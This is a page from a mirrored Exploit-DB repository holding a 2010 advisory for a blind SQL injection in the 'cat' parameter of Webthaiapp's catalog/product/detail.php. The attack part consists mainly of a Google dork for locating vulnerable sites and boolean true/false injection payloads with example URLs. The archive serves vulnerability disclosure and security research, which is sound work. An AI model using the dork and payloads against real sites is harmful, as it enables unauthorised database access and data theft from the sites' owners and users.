bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/12467.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

49 lines
No EOL
1.3 KiB
Text
Raw Blame History

--==+==================================================+==--
--==+ Webthaiapp detail.php(cat) Blind Sql injection Vulnerability +==--
--==+==================================================+==--
Date : 30-04-2010
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
AUTHOR: Xelenonz
Homepage : www.thaishadow.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
Application : Webthaiapp
Vendor : http://www.Webthaiapp.com/
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
DORK (google): "inurl:catalog/product/detail.php?cat="
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
DESCRIPTION:
EXPLOITS:
detail.php?cat=[valid catid]+and+1=1 << TRUE
detail.php?cat=[valid catid]+and+1=2 << False
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Example
http://server/catalog/product/detail.php?cat=44+and+1=1
<< True
http://server/catalog/product/detail.php?cat=44+and+1=2
<< False
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Special Thx : Krit admin@thaishadow,Thaishadow.com
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Reference in a new issue View git blame Copy permalink